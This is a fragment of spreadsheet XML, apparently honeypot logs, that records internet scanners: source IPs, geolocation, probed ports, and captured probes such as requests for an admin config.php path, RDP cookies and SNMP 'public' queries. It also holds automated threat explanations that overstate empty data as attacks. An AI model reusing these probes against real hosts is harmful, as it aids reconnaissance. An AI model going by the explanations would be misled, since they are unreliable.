'keep-alive', 'Host': '38.54.116.162', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.138.110', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '77.91.74.218', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.40.123', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '94.131.8.76', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.182.38.84', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '66.94.127.183', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '209.145.61.177', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.255.123.181', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '95.164.118.29', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '95.164.21.98', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.250.150.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.171.39', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '5.253.43.207', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '103.113.68.70', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.224.106', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.136.113', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.42.176', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '45.14.244.111', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.234.67.80', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '156.244.37.11', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.90.63.129', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.115.66', 'User-Agent': 'python-requests/2.27.1', 'method': 'GET', 'uri': '/admin/modules/framework/amp_conf/htdocs/admin/config.php'}}</t>
  </si>
  <si>
    <t>::ffff:482e:82da</t>
  </si>
  <si>
    <t>6252e91dd011d9ee37fe01c94832dde6</t>
  </si>
  <si>
    <t>178.32.72.210</t>
  </si>
  <si>
    <t>NA&amp;&amp;ronald.probe.onyphe.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_ORACLE_H4&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_LDAP_H35&amp;&amp;SMA-LAB_SMTP_H45&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SMB_H15</t>
  </si>
  <si>
    <t>64841&amp;&amp;1521&amp;&amp;23&amp;&amp;80&amp;&amp;6379&amp;&amp;49812&amp;&amp;389&amp;&amp;25&amp;&amp;445&amp;&amp;143&amp;&amp;8443&amp;&amp;1433&amp;&amp;NA&amp;&amp;110&amp;&amp;5432&amp;&amp;443&amp;&amp;16522&amp;&amp;1080</t>
  </si>
  <si>
    <t>FR</t>
  </si>
  <si>
    <t>France</t>
  </si>
  <si>
    <t>BRE</t>
  </si>
  <si>
    <t>Brittany</t>
  </si>
  <si>
    <t>Ille-et-Vilaine</t>
  </si>
  <si>
    <t>Saint-Grégoire</t>
  </si>
  <si>
    <t>2979619</t>
  </si>
  <si>
    <t>35760</t>
  </si>
  <si>
    <t>48.157</t>
  </si>
  <si>
    <t>-1.6881</t>
  </si>
  <si>
    <t>16276</t>
  </si>
  <si>
    <t>OVH SAS</t>
  </si>
  <si>
    <t>ONYPHE</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,42999)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,59837)}&amp;&amp;{Data_SMB:Incoming connection (178.32.72.210,43613)}</t>
  </si>
  <si>
    <t>::ffff:b220:48d2</t>
  </si>
  <si>
    <t>6a162d7d2e7b7d418d8c164b5b6f8e36</t>
  </si>
  <si>
    <t>179.41.4.131</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;9100&amp;&amp;14262&amp;&amp;NA&amp;&amp;47313</t>
  </si>
  <si>
    <t>Partido de Berisso</t>
  </si>
  <si>
    <t>Berisso</t>
  </si>
  <si>
    <t>3436040</t>
  </si>
  <si>
    <t>-34.8715</t>
  </si>
  <si>
    <t>-57.8833</t>
  </si>
  <si>
    <t>22927</t>
  </si>
  <si>
    <t>Telefonica de Argentina</t>
  </si>
  <si>
    <t>::ffff:b329:483</t>
  </si>
  <si>
    <t>07e3177cfc66e41797706bf3ce50d948</t>
  </si>
  <si>
    <t>120.61.25.35</t>
  </si>
  <si>
    <t>::ffff:783d:1923</t>
  </si>
  <si>
    <t>f22e8089f76b6159c27f2614d37b17c1</t>
  </si>
  <si>
    <t>59.91.242.245</t>
  </si>
  <si>
    <t>::ffff:3b5b:f2f5</t>
  </si>
  <si>
    <t>a5c3a1ea3757e2a2e266cbb60215a3fe</t>
  </si>
  <si>
    <t>117.242.199.220</t>
  </si>
  <si>
    <t>{'spamsources.fabel.dk': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}</t>
  </si>
  <si>
    <t>::ffff:75f2:c7dc</t>
  </si>
  <si>
    <t>17b38f56c694037257c3532788d9765d</t>
  </si>
  <si>
    <t>178.245.130.119</t>
  </si>
  <si>
    <t>::ffff:b2f5:8277</t>
  </si>
  <si>
    <t>b985c6617caaa5a3acccf524c695ea76</t>
  </si>
  <si>
    <t>59.92.172.129</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:3b5c:ac81</t>
  </si>
  <si>
    <t>45bdb31c3d416882638cc8f55abae350</t>
  </si>
  <si>
    <t>59.96.254.200</t>
  </si>
  <si>
    <t>BB Multiplay</t>
  </si>
  <si>
    <t>::ffff:3b60:fec8</t>
  </si>
  <si>
    <t>519f347599a6abc3e6373c297effadd3</t>
  </si>
  <si>
    <t>205.210.31.101</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_SSH_H20&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_SNMP_H33&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_SNMP_H21&amp;&amp;SMA-LAB_LDAP_HC1&amp;&amp;SMA-LAB_IRC_H17&amp;&amp;SMA-LAB_SOCKS5_H34&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_RDP_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_SOCKS5_H40&amp;&amp;SMA-LAB_IMAP_H46&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_POSTGRES_H37&amp;&amp;SMA-LAB_POP3_H36&amp;&amp;SMA-LAB_SOCKS5_H35&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_LDAP_H45&amp;&amp;SMA-LAB_FTP_H2&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_SNMP_H31&amp;&amp;SMA-LAB_LDAP_H28&amp;&amp;SMA-LAB_SNMP_H7&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_RDP_H47&amp;&amp;SMA-LAB_RDP_H19&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_ORACLE_H36&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_FTP_H10&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H22&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_ORACLE_H39&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_ORACLE_H17&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_SIP_H18&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_ORACLE_H22&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_ORACLE_H28&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_PJL_H26&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_SNMP_H34&amp;&amp;SMA-LAB_ORACLE_H44&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_FTP_H34&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_MYSQL_H15&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_PJL_H12&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_PJL_H14&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_ORACLE_H9&amp;&amp;SMA-LAB_POP3_H9&amp;&amp;SMA-LAB_SOCKS5_H20&amp;&amp;SMA-LAB_SIP_H11&amp;&amp;SMA-LAB_LDAP_H29&amp;&amp;SMA-LAB_SNMP_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6379&amp;&amp;22&amp;&amp;161&amp;&amp;9100&amp;&amp;1080&amp;&amp;23&amp;&amp;389&amp;&amp;1521&amp;&amp;445&amp;&amp;6667&amp;&amp;110&amp;&amp;3389&amp;&amp;3306&amp;&amp;143&amp;&amp;5432&amp;&amp;52283&amp;&amp;1433&amp;&amp;51717&amp;&amp;5900&amp;&amp;53092&amp;&amp;NA&amp;&amp;52898&amp;&amp;21&amp;&amp;50831&amp;&amp;56573&amp;&amp;51379&amp;&amp;8443&amp;&amp;55434&amp;&amp;52370&amp;&amp;56603&amp;&amp;80&amp;&amp;54330&amp;&amp;56783&amp;&amp;60402&amp;&amp;51071&amp;&amp;443&amp;&amp;53837&amp;&amp;56302&amp;&amp;50370</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;NA&amp;&amp;command&amp;&amp;stshash&amp;&amp;GET&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=bmPjoPEji'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZKgSNplNZ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=stQpWr'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ezAcym'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=PDhjwnjXJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fHMQZy'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=npiOjo'}}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,60994)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,61000)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,61008)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=wupMbRZmd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=XWMGrQ'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63258)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63272)}&amp;&amp;{Data_SMB:Incoming connection (205.210.31.101,63282)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lkptDQUPk'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=DRszgI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rfWWla'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=iWYRbRXYc'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sllhpI'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=tZBIAb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=TZNSeY'}}</t>
  </si>
  <si>
    <t>::ffff:cdd2:1f65</t>
  </si>
  <si>
    <t>No malicious activity detected, service unavailable or not monitored yet. No HTTP requests received for this service. Normal operational status of the service. &amp;&amp; The data suggests that there is an attempted access to a service, but it was not identified as malicious. The lack of activity data indicates that the attempt was unsuccessful or there was no interaction with the system. This could be indicative of reconnaissance or scanning activity. &amp;&amp; Possible brute-force login attempt via remote desktop connection, as RDP is often targeted by attackers for unauthorized access to systems. The fact that the RDP status is marked as NA (not available) suggests an unknown or unexpected state. This could indicate a potential security breach in progress. &amp;&amp; There is an attempt to access Microsoft SQL Server database, which could be a sign of a potential SQL injection attack or unauthorized access to sensitive data. This might indicate malicious activity aimed at exploiting vulnerabilities in the system's database management. The lack of access to MSSQL server data suggests that the attacker was attempting to access information they shouldn't have. &amp;&amp; There is no log data provided, so I have nothing to analyze or explain. &amp;&amp; The data suggests a potential brute force attack on a service using a well-known default community string, which could be an attempt to gain unauthorized access. This is because the attacker is likely trying multiple combinations of credentials. The use of a public community string indicates a lack of security configuration.</t>
  </si>
  <si>
    <t>Unknown Access &amp;&amp; LDAP Attack &amp;&amp; SNMP Bruteforce</t>
  </si>
  <si>
    <t>a4fc2a11d157deb781c38464e0f00cef</t>
  </si>
  <si>
    <t>18.97.5.1</t>
  </si>
  <si>
    <t>ec2-18-97-5-1.compute-1.amazonaws.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_DNS_H47&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POSTGRES_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;53&amp;&amp;41208&amp;&amp;5432&amp;&amp;21&amp;&amp;389</t>
  </si>
  <si>
    <t>VA</t>
  </si>
  <si>
    <t>Virginia</t>
  </si>
  <si>
    <t>Loudoun</t>
  </si>
  <si>
    <t>Ashburn</t>
  </si>
  <si>
    <t>4744870</t>
  </si>
  <si>
    <t>20149</t>
  </si>
  <si>
    <t>39.0438</t>
  </si>
  <si>
    <t>-77.4874</t>
  </si>
  <si>
    <t>14618</t>
  </si>
  <si>
    <t>Amazon.com, Inc.</t>
  </si>
  <si>
    <t>Amazon Technologies Inc</t>
  </si>
  <si>
    <t>2019-10-07</t>
  </si>
  <si>
    <t>AT-88-Z</t>
  </si>
  <si>
    <t>2021-02-10</t>
  </si>
  <si>
    <t>connection&amp;&amp;login&amp;&amp;command</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_LDAP:NA}</t>
  </si>
  <si>
    <t>2005-08-18 02:10:45</t>
  </si>
  <si>
    <t>2027-01-16 04:59:59</t>
  </si>
  <si>
    <t>2024-01-29 18:09:26</t>
  </si>
  <si>
    <t>['NS-1321.AWSDNS-37.ORG', 'NS-1670.AWSDNS-16.CO.UK', 'NS-27.AWSDNS-03.COM', 'NS-967.AWSDNS-56.NET']</t>
  </si>
  <si>
    <t>MarkMonitor Inc.</t>
  </si>
  <si>
    <t>['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited']</t>
  </si>
  <si>
    <t>abusecomplaints@markmonitor.com</t>
  </si>
  <si>
    <t>::ffff:1261:501</t>
  </si>
  <si>
    <t>0fa5ef123d4ce7848ad98c7df7c747d8</t>
  </si>
  <si>
    <t>154.212.141.216</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_HTTPS_H9&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POSTGRES_H22&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_IMAP_H23&amp;&amp;SMA-LAB_IMAP_H4&amp;&amp;SMA-LAB_MYSQL_H11&amp;&amp;SMA-LAB_PJL_H19&amp;&amp;SMA-LAB_SMTP_H7&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_IMAP_H35&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_POP3_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;21&amp;&amp;22&amp;&amp;443&amp;&amp;5432&amp;&amp;9100&amp;&amp;445&amp;&amp;3306&amp;&amp;25&amp;&amp;80&amp;&amp;23&amp;&amp;110&amp;&amp;NA&amp;&amp;143&amp;&amp;3389</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}</t>
  </si>
  <si>
    <t>command&amp;&amp;connection&amp;&amp;query&amp;&amp;request&amp;&amp;login&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
